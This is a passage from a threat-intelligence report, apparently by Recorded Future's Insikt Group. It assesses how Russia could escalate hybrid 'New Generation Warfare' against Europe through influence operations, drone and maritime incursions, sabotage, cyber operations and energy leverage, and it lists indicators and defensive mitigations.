            <div><strong>March 2014–January 2026:</strong> Russia has increasingly <a href="https://en.defence-ua.com">used</a> precision weapons (for example, Iskander-M ballistic missiles, Kalibr cruise missiles, and Kh-101/555 air-launched cruise missiles), GRU special operations <a href="https://www.osce.org/sites/default/files/f/documents/d/1/220141.pdf">units</a> (including the 3rd Separate Spetsnaz Brigade and the 346th Independent Spetsnaz Brigade), and <a href="https://www.dia.mil/Portals/110/Documents/News/Military_Power_Publications/UAV_Book.pdf">unmanned</a> systems (such as Orlan-10, Lancet, and Shahed-136 drones, and ground robots for logistics and mine-clearing operations).</div>
          </div>
          <div>
            <div>Simultaneous effects on line-units and enemy facilities throughout the enemy state’s territory</div>
            <div><strong>March 2014–January 2026:</strong> Russia has <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a">conducted</a> strikes across Ukraine, using frontline units, operational rear units, missile and ground attacks, and cyber operations.</div>
          </div>
          <div>
            <div>Warfare simultaneously in physical and information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has consistently used covert and overt means to <a href="https://stratcomcoe.org/publications/analysis-of-russias-information-campaign-against-ukraine/151">propagate</a> narratives meant to justify intervention and regime change in Ukraine. These include <a href="https://www.euvsdisinfo.eu/report/ukraine-promotes-nazism-because-it-oppresses-russians/">allegations</a> of Nazism in the Ukrainian military and government writ large; discrimination against Russians in Ukraine; and Western government efforts to foment revolution in Ukraine.</div>
          </div>
          <div>
            <div>Use of asymmetric and indirect operations</div>
            <div>
              <p><strong>March 2014–February 2022:</strong> Russia’s operations were indirect because they <a href="https://www.congress.gov/crs_external_products/IF/PDF/IF12344/IF12344.3.pdf">included</a> non-acknowledged units, private military companies, and proxy forces such as Donetsk People’s Republic (DPR) and Luhansk People’s Republic (LPR) militias.</p>
              <p><strong>February 2022–January 2026:</strong> Russia escalated its use of asymmetric and indirect operations against Europe, including <a href="https://www.gov.uk/government/news/joint-expeditionary-force-activates-uk-led-reaction-system-to-track-threats-to-undersea-infrastructure-and-monitor-russian-shadow-fleet">targeting</a> undersea cables and critical infrastructure, likely to pressure Europe and Kyiv to abandon efforts to resist Russia’s Ukraine campaign.</p>
            </div>
          </div>
          <div>
            <div>Command and control of forces and assets in a unified information space</div>
            <div><strong>March 2014–January 2026:</strong> Russia has attempted to <a href="https://www.usmcu.edu/Outreach/Marine-Corps-University-Press/MCU-Journal/JAMS-vol-14-no-2/Russias-War-in-Ukraine/">integrate</a> its C2 structures, including shared ISR, targeting data, and operational planning, across services, and has centralized strike coordination for long-range fires.<br /><br />However, limitations have been <a href="https://www.congress.gov/crs_external_products/R/PDF/R47068/R47068.1.pdf">apparent</a> in Russia’s ability to accomplish this, especially since February 2022, likely stemming from deficiencies such as poor inter-service coordination, rigid command structures, and underestimation of Ukrainian capabilities and willingness to fight.</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>New Generation Warfare principles (Source: Recorded Future)</em></p>
        <h2>New Generation Warfare Toolkit</h2>
        <p>In a full-scale New Generation Warfare campaign in Europe, Russia would likely move from its current pattern of influence operations combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is both proactive and reactive. It would likely involve the same tactics Russia has used against NATO states for the past few years. The difference would likely be that Russia would deploy these tactics more frequently and across a greater number of states at once. A full NGW campaign would likely also involve using some operational methods simultaneously and in ways that amplify one another.</p>
        <p>Even in a full-scale NGW campaign, Russia would very likely aim to keep destruction below the threshold that risks NATO invoking Article 5. NATO officials have not specified precisely what the Article 5 threshold is; indeed, former NATO Secretary General Jens Stoltenberg <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">stated</a> that the grounds for invoking Article 5 “must remain purposefully vague.” However, it is likely that it would include a mass casualty event or the use of a chemical or biological weapon. The text of Article 5 <a href="https://www.nato.int/en/what-we-do/introduction-to-nato/collective-defence-and-article-5">specifies</a> that the threshold involves “an armed attack.” NATO officials <a href="https://ccdcoe.org/library/publications/cyber-attacks-and-article-5-a-note-on-a-blurry-but-consistent-position-of-nato/">said</a> in 2022 that a cyberattack could constitute grounds for invoking Article 5, though they did not specify what kind of cyberattack would qualify.</p>
        <p>Russia is likely to face few downsides during an NGW campaign, due to minimal risk of Russian casualties and the campaign’s tactical flexibility. Unlike a conventional military campaign, which risks a high level of casualties that can cause domestic public dissatisfaction, an NGW campaign very likely would involve minimal risk to Russian citizens. In addition, an NGW campaign inherently offers significant tactical flexibility, as it is not a declared campaign in which Russia needs to articulate goals to justify the campaign to the Russian public and elites. As such, Putin would likely have the option to draw down tactics that are proving less effective and increase the use of more effective tactics, without needing to justify tactical failures. This flexibility would likely allow Putin to continue at least aspects of an NGW campaign in the likely event that Europe responds to an NGW campaign with escalated efforts to counter Moscow.</p>
        <h3>Influence Operations and Propaganda</h3>
        <p>Russian “active measures” serve as a force multiplier for Moscow’s broader political warfare, integrating influence operations, propaganda, and sabotage. In Europe, these efforts aim to weaken transatlantic cohesion, erode public and political support for Ukrainian sovereignty and assistance to Kyiv, and exacerbate internal societal divisions, economic uncertainty, and other challenges. By cultivating sanctions fatigue and encouraging selective bilateral re-engagement with Russia through active measures, Moscow seeks to mitigate its international isolation and <a href="https://www.cnas.org/publications/commentary/russia-wants-a-new-world-order">undermine</a> the rules-based international order, thereby advancing a Russia-favored multipolar system <a href="https://www.csis.org/blogs/post-soviet-post/four-myths-about-russian-grand-strategy">characterized</a> by exclusive spheres of influence. Notably, these activities also include angles of domestic preservation by portraying the West as chaotic, corrupt, and immoral, and thereby discouraging the expansion of liberal democracies elsewhere, particularly from within.</p>
        <p>Since Russia’s full-scale invasion of Ukraine in 2022, Insikt Group has observed concentrated Russian influence operations targeting the domestic audiences of what Moscow likely views as Kyiv’s core European supporters: the UK, France, Germany, and Poland. Insikt Group investigations, in addition to public reporting, have previously identified multiple influence operations targeting the above-mentioned major European allies, including Doppelgänger, Operation Overload, Operation Undercut, and CopyCop. These influence operations have commonly impersonated national and pan-European media outlets to disseminate messages aligned with Kremlin propaganda, including anti-Ukraine themes and content that denigrates pro-European political figures. Elsewhere, Russian influence operations have sought to use fear and physical demonstrations to manipulate public opinion. In France, for example, Russia-linked physical intimidation very likely intended to provoke public anxiety and societal unrest <a href="https://www.bbc.com/news/world-europe-67360768">included</a> the Star of David and red hand graffiti, as well as the <a href="https://www.lemonde.fr/en/pixels/article/2024/06/03/coffins-at-the-eiffel-tower-suspicions-point-to-another-case-of-russian-interference_6673608_13.html">placement</a> of caskets near the Eiffel Tower ahead of the 2024 Paris Olympic Games. Similar efforts have also appeared elsewhere in Europe, including the <a href="https://edition.cnn.com/2024/09/13/europe/pro-russian-posters-italy-intl-scli">emergence</a> of pro-Russian billboards in Italy and the "Children of War, Alley of Angels" <a href="https://eaworldview.com/2025/02/ukraine-war-europe-facing-trump-russia/">exhibit</a> in Germany.</p>
        <p>Russian influence efforts have also leveraged illicit financing and alleged bribery to attempt to favorably reshape European politics. For example, in spring 2024, Czech authorities <a href="https://www.politico.eu/article/czech-republic-russia-influence-voice-of-europe/">accused</a> the Voice of Europe, an organization linked to Viktor Medvedchuk, of paying politicians in several EU countries to spread anti-Ukraine messages. In September and October 2024, Moldovan police <a href="https://www.reuters.com/world/europe/moldova-says-russia-linked-network-tried-buy-votes-2024-10-04/">reported</a> that a Russia-linked network, allegedly run by fugitive oligarch Ilan Shor, channeled tens of millions of dollars to buy votes ahead of Moldova’s October 20, 2024, presidential election and EU referendum. In December 2024, Romanian prosecutors <a href="https://www.reuters.com/world/europe/romania-probes-alleged-russian-linked-campaign-financing-tiktok-2024-12-06/">conducted</a> raids and opened probes into alleged illegal campaign financing and payments to TikTok users and influencers associated with the subsequently annulled presidential vote. More recently, former UK Member of the European Parliament (MEP) Nathan Gill was <a href="https://www.reuters.com/world/uk/former-uk-mep-jailed-accepting-bribes-linked-russia-2025-11-21/">sentenced</a> on November 21, 2025, after pleading guilty to accepting bribes to make pro-Russian statements.</p>
        <p>Insikt Group assesses that Russia’s NGW against Europe will likely consist of aggressive influence operations that aim to erode European unity and advance Russia’s quest for a multipolar world order. NGW will very likely continue supporting Moscow’s core objectives of eroding political and public support for Ukrainian sovereignty and assistance to Kyiv, accelerating sanctions fatigue, and exploiting domestic political crises and election cycles to fracture European cohesiveness and transatlantic cooperation. Moscow will likely expand its reliance on access to third parties and intermediaries, including sympathetic socio-political organizations and fringe movements, to launder Kremlin-aligned messages into the European information environment.</p>
        <p>Across Europe, Russia will almost certainly continue to attempt to delegitimize existing democratic institutions and Europe’s information ecosystem by continuing to foster distrust in elections, mainstream media, the EU, and pro-European government figures. In a post-war environment, assuming European sanctions on Russian media enterprises are lifted, Russia will very likely attempt to reestablish its state media presence while also hardening itself to withstand future disruptions, legal restrictions, and platform or government takedowns in the event of a kinetic conflict with Europe.</p>
        <p>New Generation Warfare operations against Europe will very likely incorporate much of Russia’s current-era influence tradecraft, including social media influence via human and automated networks, media impersonation and covert media outlet brands, illicit financing and bribery, and cyber-enabled influence such as hack-and-leak narratives. Further, Insikt Group assesses Moscow will very likely continue attempting to cultivate sympathetic allies through covertly funded fringe socio-political organizations, using these entities to astroturf “grassroots” support, amplify Kremlin-aligned narratives, and catalyze or intensify domestic unrest across Europe. We assess that Russia will also adapt emerging technologies, particularly AI, to scale the production, localization, and quality of influence content, increase dissemination efficiency, and optimize targeting. Continued advances in generative AI will almost certainly improve the realism of propaganda images and fabricated reporting, forged documents and correspondence, and synthetic impersonations of public figures, including audio and video deepfakes.</p>
        <h3>Airspace Incursions by Drones and Jets</h3>
        <p>Beginning in September 2025, suspected violations of NATO airspace by Russia-directed drone operators or Russian jets increased to unprecedented levels, as Russia likely sought to project power across NATO territory and test NATO resolve while maintaining plausible deniability. Insikt Group tracked 30 suspected or confirmed violations between September 2025 and January 2026, compared to 23 suspected or confirmed violations between March 2022 and August 2025. The most commonly targeted countries since March 2022 have been Poland and Romania; however, suspected Russian violations of NATO airspace have also occurred outside of Russia’s historic sphere of influence, including in Germany, the UK, Denmark, and Norway. Violations have most frequently targeted critical infrastructure, such as military bases and airports.</p>
        <p>In a full-scale New Generation Warfare-like campaign in Europe, Russia likely would escalate the frequency and level of aggressiveness of these violations. Russia’s targeting would likely continue to focus on critical infrastructure, but violations would very likely significantly increase in frequency. Russia would also likely use drones to fly closer to targets and perhaps hover over them for extended periods of time, in a likely effort to test NATO’s willingness to shoot down drones and perhaps collect intelligence on critical infrastructure facilities. Indeed, in September 2025, Polish authorities said they <a href="https://www.bbc.com/news/articles/c147065pzdzo">shot</a> down Russian drones that violated Poland’s airspace.</p>
        <p>Other ways Russia would likely escalate the aggressiveness of its airspace violations include timing those violations with major NATO events, such as military exercises and summits. Russia could escalate its use of drones as electronic warfare mechanisms, perhaps to disrupt NATO military exercises or the functioning of critical infrastructure facilities.</p>
        <p>Russia would likely also use its drones to amplify its psychological warfare as a way of projecting power and demonstrating to the public that Moscow can disrupt everyday life in NATO countries. Russia could do this via tactics such as hovering drones over civilian transportation infrastructure, like railways or airports, which have already been <a href="https://www.cbsnews.com/news/drones-europe-nato-airports-russia-hybrid-warfare-belgium-uk-anti-drone-troops/">forced</a> to temporarily close. Russia could also launch drones over facilities hosting political summits, such as the annual NATO Summit, or over polling places during elections to stoke public fear. In a full-scale NGW campaign that involves coordination of multiple tactics, Russian propaganda outlets might release footage of these incidents to propagate a narrative that NATO states cannot protect their infrastructure. Russia could also combine drone or jet violations with sabotage operations to further sow public panic and force NATO governments into a defensive posture.</p>
        <p>Russia would very likely seek to maintain some level of deniability and would avoid airstrikes and mass casualty events, which would almost certainly guarantee an Article 5 declaration.</p>
        <h3>Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <p>Insikt Group assesses that, since February 2022, Russia has increasingly used violations of NATO states’ territorial waters<sup>4</sup> and targeting of undersea cables to test the alliance’s resilience, collect intelligence, keep NATO in a reactive, defensive posture, and attempt to deter NATO from undermining Russian strategic interests. In June 2023, Deputy Chairman of the Security Council Dmitriy Medvedev <a href="https://www.reuters.com/world/europe/russias-medvedev-says-moscow-now-has-free-hand-destroy-enemies-undersea-2023-06-14/">stated</a> that, “if we proceed from the proven complicity of Western countries in blowing up the Nord Streams, then we have no constraints — even moral — left to prevent us from destroying the ocean-floor cable communications of our enemies.” Medvedev’s comments were likely purposefully hyperbolic; however, they likely reflect a Kremlin perception that NATO is targeting Russian strategic interests, thereby justifying retaliatory action.</p>
        <p>Examples of Russia likely targeting undersea cables and maritime assets include an April 2025 incident in which the UK <a href="https://www.thetimes.com/uk/defence/article/russia-secret-war-uk-waters-submarines-dpbzphfx5">identified</a> Russian sensors attempting to collect intelligence on UK nuclear submarines and other underwater critical infrastructure; the Russian Yantar surveillance ship <a href="https://www.theguardian.com/world/2024/nov/16/russian-spy-ship-escorted-away-from-internet-cables-in-irish-sea">sailing</a> near cables carrying data for Google and Microsoft under the Irish Sea in November 2024; and reports suggesting that the Russian Eagle S ship accused of damaging multiple undersea cables in December 2024 <a href="https://www.lloydslist.com/LL1151955/Russia-linked-cable-cutting-tanker-seized-by-Finland-was-loaded-with-spying-equipment">carried</a> spy equipment to monitor naval activity.</p>
        <p>Russian ships have also violated NATO states’ territorial waters, likely to test NATO resilience, force NATO into a defensive posture, and project power. Examples include a July 2025 incident in which a Russian border guard vessel <a href="https://news.err.ee/1609755954/russian-border-guard-vessel-violates-estonia-s-maritime-border">entered</a> Estonian territorial waters without permission; a July 2024 incident in which a Russian naval vessel <a href="https://www.rferl.org/a/finland-russia-vessel-border-guard-territorial-waters/33052301.html?utm_source=chatgpt.com">entered</a> Finnish territorial waters without authorization; and frequent <a href="https://apnews.com/article/nato-russia-shadow-fleet-jets-ukraine-sanctions-oil-revenue-5e74109e5b1d84dc73ac2592068d4689">encounters</a> between NATO states and Russia-linked “shadow fleet” vessels. These vessels are tankers sailing under other flags, which often refuse inspection or orders from local navies.</p>
        <p>During a full-scale New Generation Warfare campaign against NATO, Russia likely would escalate its targeting of undersea cables and violations of territorial waters. This could include more frequent cable targeting, likely to cause minor but persistent damage to undersea critical infrastructure that tests NATO resilience and Russian destructive capabilities without provoking an Article 5 declaration. Russia could also conduct electronic jamming operations during cable repairs to inhibit communications and use Russian ships to harass those conducting repairs.</p>
        <p>Russia would also likely attempt longer and more provocative territorial waters violations, including placing Russian ships near NATO vessels and expanding these activities into areas such as the Mediterranean; conducting concurrent hybrid activity such as GPS jamming and automatic identification system (AIS) spoofing; refusing escort out of territorial waters; and combining territorial waters violations with airspace violations by Russian aircraft or targeting of undersea infrastructure.</p>
        <p>Russia would likely aim to overwhelm NATO’s existing efforts to prevent sabotage of undersea infrastructure. In January 2025, Allied Joint Force Command Brunssum (JFCBS) <a href="https://shape.nato.int/operations/operations-and-missions/baltic-sentry">launched</a> Baltic Sentry — a campaign that uses tools such as frigates, maritime patrol assets, and naval drones to deter sabotage of undersea infrastructure. Since the launch of Baltic Sentry, the Baltic Sea has <a href="https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/how-the-baltic-sea-nations-have-tackled-suspicious-cable-cuts/">experienced</a> very few undersea sabotage efforts; however, it is not clear whether this is the result of Baltic Sentry or a lack of planned operations.</p>
        <h3>Sabotage Operations</h3>
        <p>We assess that Russia has escalated its use of sabotage operations in NATO territory since its full-scale invasion of Ukraine in 2022, likely to test the resilience of NATO states’ critical infrastructure in particular; propagate a narrative that Western states cannot protect their populations from threats; harm NATO’s ability to collectively respond to Russian aggression by forcing NATO into a reactive, defensive posture; and degrade NATO states’ ability to provide material support to Ukraine. Sabotage operations are loosely defined, but typically <a href="https://www.rferl.org/a/parcels-exploded-russian-plot/33189080.html">consist</a> of physical attacks on <a href="https://apnews.com/article/lithuania-russia-intelligence-arson-attack-ikea-vilnius-b7f915c6376c0711b852657d17a30c0d">civilian</a> or dual-use <a href="https://foreignpolicy.com/2024/07/26/russia-sabotage-poison-finland-water-treatment/">infrastructure</a> carried out by deniable entities.</p>
        <p>Particularly since 2022, Russia-linked entities have focused sabotage operations on critical infrastructure in NATO states, exploiting vulnerabilities stemming from <a href="https://www.fme.nl/system/files/publicaties/2023-12/rapport%20infra%20maintenance%20EU%20%2B%20intro.pdf">deferred</a> maintenance and a lack of sufficient public or private <a href="https://www.visualcapitalist.com/sp/charted-europes-2-trillion-infrastructure-investment-deficit-gxeu01/">investment</a> in upkeep. Within critical infrastructure, the most frequently <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> sectors include undersea telecommunication and power cables; water supply and distribution; transportation; military; healthcare; and telecommunications. The number of Russian sabotage operations quadrupled from 2023 to 2024, and in 2025 it was likely at levels consistent with 2024. Operations have occurred across NATO, rather than being focused in Russia’s historic sphere of influence. That said, the most commonly <a href="https://www.iiss.org/research-paper/2025/08/the-scale-of-russian--sabotage-operations--against-europes-critical--infrastructure/">targeted</a> states between January 2018 and June 2025 were Germany, Estonia, Latvia, Lithuania, and Poland.</p>
        <p>In a New Generation Warfare-like campaign targeting NATO territory, Moscow would likely move from what we assess has thus far been largely opportunistic sabotage to operations with more consistency and geographic breadth, and that complement other tactics.</p>
        <p>Russia would likely still focus its sabotage operations on critical infrastructure, but would likely place a premium on damaging the critical infrastructure of NATO states that either would be probable targets of a Russian military incursion — such as Poland or the Baltic states — or would lend significant assistance to those states, such as the UK, Germany, or France. This is because in an NGW campaign, Russia would likely view sabotage operations as, in part, a way to test the resilience of potential victim states and their allies. Russia’s sabotage operations against those targets would likely be more frequent and could coincide with significant events such as elections or military exercises. Russia would likely pair sabotage operations with other tactics, such as offensive cyber operations or airspace violations, to augment the destructive impact of the operations and try to strain NATO states’ capacity by forcing them to respond to multiple disruptions at once, while still staying below the threshold that would risk an Article 5 declaration.</p>
        <h3>Offensive Cyber Operations for Disruption and Counterintelligence</h3>
        <p>Russian cyber activity directed at European targets has consistently emphasized access-oriented operations, including attacks on internet-facing firewalls, virtual private networks (VPNs), email services, and web portals. This activity aligns with documented Russian cyber practices focused on enabling intelligence collection, operational reach, and long-term flexibility rather than immediate disruptive effects. Recent Insikt Group reporting highlights BlueEcho activity targeting perimeter infrastructure to establish footholds and enable follow-on credential capture and lateral movement, while BlueDelta campaigns demonstrate sustained credential harvesting at scale using impersonated Microsoft Outlook Web App (OWA), Sophos VPN, and Google login workflows. This tradecraft is low-cost, repeatable, and consistent with long-term counterintelligence targeting of government, defense, and research entities.</p>
        <p>Russian cyber activity affecting Europe has been broad in scope, with targeting observed across <a href="https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting">multiple regions and sectors</a>. If cyber operations were used for more overtly disruptive purposes, effects would likely be more pronounced in states with weaker cybersecurity maturity or slower coordinated response mechanisms, such as fragmented local-government IT environments or limited national incident response surge capacity. This does not preclude activity against major NATO states, where Russian cyber operations have historically focused more heavily on intelligence collection and access. BlueDelta’s targeting of NATO-aligned and defense-related organizations reflects continued Russian interest in strategically valuable European targets aligned with GRU intelligence requirements.</p>
        <p>Observed Russian cyber activity also provides insight into how operations could escalate if strategic conditions were to change and Russia were to launch a full-scale NGW campaign. Russian threat actors have demonstrated the ability to establish and maintain access over time, including through persistent connections and tunneling, which could be repurposed to degrade remote access services, manipulate edge-device configurations, or cause temporary service disruption. In Ukraine, cyber activity has been observed alongside influence operations and physical sabotage, including Recorded Future–tracked influence campaigns such as <a href="https://www.recordedfuture.com/research/copycop-deepens-its-playbook-with-new-websites-and-targets">CopyCop</a>, which leveraged automated content replication and spoofed media infrastructure to amplify pro-Russian narratives in parallel with other forms of hybrid activity. If applied elsewhere, similar coordination could increase pressure on incident response capabilities and undermine public confidence in the reliability of essential services. Credential-harvesting operations further provide pathways beyond inbox access, including potential compromise of identity providers, VPN portals, and privileged administrative portals.</p>
        <p>Russian cyber operations have historically involved establishing and maintaining access to targeted networks over extended periods, a pattern also <a href="https://www.security.com/blog-post/ukraine-russia-attacks">documented</a> in prior campaigns in Ukraine. However, there is no public evidence demonstrating that the access currently observed in European networks is intended for future disruptive operations. If a kinetic conflict were to escalate in Europe, Russia would likely seek to expand or prioritize access within relevant networks to support intelligence collection, operational coordination, or potential disruption. Russia also has a <a href="https://www.recordedfuture.com/research/dark-covenant-3-controlled-impunity-and-russias-cybercriminals">documented</a> history of tolerating or leveraging cybercriminal activity alongside state-directed operations, including overlap with criminal infrastructure and access brokers, which may allow operators to expand scale, complicate attribution, and generate disruptive effects without overtly exposing state-linked capabilities. Collectively, activity associated with BlueAlpha, BlueDelta, BlueEcho, Sandworm, and Dragonfly illustrates Russia’s ability to scale cyber operations from access and intelligence collection toward disruption if strategic conditions were to change, consistent with broader hybrid and New Generation Warfare practices.</p>
        <h3>Exploitation of European Dependence on Russian Oil and Natural Gas</h3>
        <p>Russia has long exploited other states’ dependence on its natural gas and oil to exercise leverage over them, typically by strategically <a href="https://www.reuters.com/world/poland-bulgaria-face-russian-gas-cut-ukraine-crisis-escalates-2022-04-26/">decreasing</a> supply flows, particularly during high-demand periods, such as winter. For example, in 2006, Georgia <a href="https://www.rferl.org/a/1064976.html">accused</a> Russia of intentionally cutting gas supplies during an unusually cold period to increase political pressure on Tbilisi. In the run-up to Russia’s full-scale invasion of Ukraine in February 2022, Russian state gas company Gazprom <a href="https://www.reuters.com/world/europe/gazprom-cuts-gas-flows-europe-ukraine-tensions-2021-10-06/">reduced</a> natural gas deliveries to Europe, likely in an effort to pressure Europe into abandoning a unified stance on supporting Ukraine.</p>
        <p>Since 2022, many NATO states have sought to <a href="https://gasoutlook.com/analysis/europe-breaks-with-russian-gas-but-still-depends-on-the-u-s/">reduce</a> their dependence on Russian natural gas and oil; however, several states remain dependent, including <a href="https://pism.pl/publications/slovakia-remains-dependent-on-russian-energy">Slovakia, Hungary, and Türkiye</a>. In a full-scale New Generation Warfare campaign in Europe, Russia would very likely escalate its exploitation of those states’ dependence on Russian energy imports to demonstrate Moscow’s ability to degrade European critical infrastructure, undermine NATO unity, gauge the resilience of these states’ critical infrastructure, and test Russia’s ability to handicap critical infrastructure, should Putin decide to launch a military incursion into NATO territory.</p>
        <p>Moscow’s willingness to exploit these states’ dependence on Russian energy likely varies by state. Moscow is less likely to exploit Hungary’s dependence on Russian oil and gas, given Budapest’s <a href="https://www.bbc.com/news/articles/c058lny3pdqo">strong</a> relations with Russia. Slovakia is a more likely target, as it seeks a <a href="https://www.reuters.com/business/energy/slovakia-wants-normalise-relations-with-russia-ramping-up-gas-imports-pm-fico-2025-09-02/">positive</a> relationship with Moscow, but is likely of less strategic importance to Russia than Hungary. Moscow’s relations with Türkiye have <a href="https://carnegieendowment.org/research/2024/10/understanding-turkiyes-entanglement-with-russia">fluctuated</a> between positive and adversarial; the likelihood of exploiting Türkiye’s dependence on Russian energy imports would likely depend, in part, on how positive the overall Russia-Türkiye relationship is at that time.</p>
        <p>Escalation of economic critical infrastructure targeting would likely take the form of both more frequent and more geographically broad operations, particularly during high-demand periods such as the winter and perhaps during NATO military exercises or elections. Russia could also escalate its use of pricing manipulation to punish states that work against Russia’s strategic priorities in Ukraine, and reward pro-Russia states such as Hungary.</p>
        <p>Russia would also likely combine supply cuts with sabotage operations. For example, in 2006, Moscow <a href="https://www.reuters.com/article/world/georgia-hit-by-gas-cut-and-power-line-blast-idUSL08601420060122/">cut</a> gas supplies in Georgia at the same time it sabotaged an electricity line. Following a successful operation, pro-Russia propaganda outlets would likely amplify narratives that claim European critical infrastructure is weak and vulnerable, and that this demonstrates the inadequacy of democracy and the Western political system writ large at fulfilling basic public needs.</p>
        <p>In a New Generation Warfare campaign against Europe, Russia would be unlikely to seek permanent damage to European critical infrastructure or mass civilian harm from disruption of energy flows. Russia would also likely avoid long-term disruption of oil and gas deliveries to limit the financial impact, since oil and gas revenues <a href="https://www.reuters.com/business/energy/russias-oil-gas-budget-revenue-set-sink-46-january-reuters-calculations-show-2026-01-19/#:~:text=Summary,the%20same%20month%20in%202024.">comprise</a> roughly 25% of Russia’s annual federal revenue.</p>
        <h2>Indicators of NGW Campaign in Europe, Implications for Public and Private Sectors, and Recommended Mitigations</h2>
        <h3>Tactic: Influence Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Increased convergence of narratives across propaganda outlets, including state media, inauthentic social media accounts, and so on</li>
          <li>Parallel narratives tailored to each country or region</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public Sector:</strong> more pronounced political polarization; reduced public trust in government competence</li>
          <li><strong>Private Sector:</strong> brand damage if firms are targeted in influence operation (IO) campaigns; employee or executive harassment or doxxing</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Ensure communication response protocols are in place, such as rapid rebuttal measures</li>
          <li>Ensure information environment monitoring is attuned to Russia-nexus narratives so inauthentic behavior can be detected quickly</li>
        </ul>
        <h3>Tactic: Airspace Incursions by Drones and Jets</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent incursions that last longer and target strategic sites such as military training grounds, critical infrastructure nodes, and so on</li>
          <li>Incursions are conducted at lower altitudes, with transponders turned off</li>
          <li>Violations are clustered around NATO decisions or major military exercises</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> forced closures of critical infrastructure sites during airspace violations, thereby disrupting operations, as well as likely escalation of public alarm and potential decrease in public confidence in the government’s ability to keep critical infrastructure safe</li>
          <li><strong>Private:</strong> business operation disruptions due to critical infrastructure closures</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Strengthen counter-measures against unmanned aircraft systems (UASs) around critical sites</li>
          <li>Ensure joint civil-military air incident protocols are in place, including aviation alerts and Notice to Airmen (NOTAM) coordination</li>
          <li>Improve GPS resilience</li>
        </ul>
        <h3>Tactic: Territorial Waters Violations and Targeting of Undersea Cables</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent territorial waters violations</li>
          <li>Violations by state-linked vessels</li>
          <li>Non-compliance with escort or hails; risky maneuvering around NATO state vessels, perhaps to provoke potential collisions</li>
          <li>Increased loitering of suspicious vessels near cable routes and landing areas</li>
          <li>Repeated “anchor drag” incidents</li>
          <li>Interference with repair ships</li>
          <li>Simultaneous cyber activity against telecommunications and energy operators</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> intermittent communications degradation; potential harm to energy infrastructure</li>
          <li><strong>Private:</strong> major potential operational losses for telecommunications, finance, and other key sectors; potential increases in insurance costs for shipping companies, should territorial waters violations at ports become common</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Consider mapping alternative sea routes in case primary routes are disrupted; consider rapid reroute contracts</li>
          <li>Ensure sufficient port and state coordination</li>
          <li>Ensure physical hardening at cable landing sites</li>
          <li>Expand Baltic Sentry efforts to other locations</li>
        </ul>
        <h3>Tactic: Sabotage Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>More frequent operations, including arson, vandalism, explosions, and rail disruptions</li>
          <li>Targeting of high-priority sites, such as military logistics hubs, defense suppliers, and so on</li>
          <li>Targeting of civilian sites, such as shopping malls or residential neighborhoods</li>
          <li>Concurrent operations in multiple geographic regions, suggesting intentional planning</li>
          <li>Combined sabotage operations and airspace or territorial waters violations</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> potential reduction in public confidence in government’s ability to protect critical infrastructure and residential areas; in the event of significant escalation in sabotage operations, emergency services could be strained</li>
          <li><strong>Private:</strong> facility damage or loss; threat to worker safety; supply chain interruption; business interruption; reputational liability</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Expand insider threat and contractor vetting at critical infrastructure sites</li>
          <li>Ensure physical security measures are in place, including perimeter detection, anti-drone measures, camera coverage, and access control</li>
          <li>Enhance public-private partnerships, as most of the critical infrastructure NATO relies upon is commercially owned</li>
          <li>Ensure rapid liaison channels with law enforcement and intelligence services</li>
        </ul>
        <h3>Tactic: Offensive Cyber Operations</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Campaigns that target strategic pressure points, such as logistics and transportation hubs, defense supply chains, and local government entities</li>
          <li>Intrusion and distributed denial-of-service (DDoS) activity spikes at politically significant moments, including elections, military exercises, or geopolitical summits</li>
          <li>Campaigns that blend state and proxy activity, such as hacktivist DDoS campaigns that amplify Kremlin-aligned narratives</li>
          <li>Coupling of multiple tactics, such as cyber and influence operation hybrid campaigns</li>
        </ul>
        <h4>Implications for Public and Private Sectors</h4>
        <ul>
          <li><strong>Public:</strong> DDoS and ransomware campaigns can undermine public confidence in the reliability of institutions; compromise of government narratives can result in less public confidence in the truth of government messaging; even attempted election manipulation can reduce confidence in voting systems</li>
          <li><strong>Private:</strong> elevated risk of disruption of key logistics, transport, rail, and aviation systems; hack and leak operations pose risk to reputation, personally identifiable information, and intellectual property rights; targeting of critical infrastructure can result in operational disruption</li>
        </ul>
        <h4>Recommended Mitigations</h4>
        <ul>
          <li>Enforce phishing-resistant multi-factor authentication</li>
          <li>Implement conditional network access based on geopolitical and risk factors</li>
          <li>Patch for commonly exploited software</li>
          <li>Reduce exposure (lock down admin portals; restrict by IP address; remove unused services)</li>
          <li>Use DDoS protection, autoscaling</li>
          <li>Coordinate with the national computer emergency response team (CERT) and National Counterintelligence and Security Center (NCSC), as well as upstream providers; rehearse continuity plans</li>
          <li>Require multi-factor authentication (MFA) and logging parity from third-party providers; segment privileged access; monitor for abnormal remote management activity</li>
        </ul>
        <h3>Tactic: Leveraging Economic Dependence</h3>
        <h4>Indicators of an NGW Campaign</h4>
        <ul>
          <li>Supply manipulation, including threats or actions to raise price volatility</li>
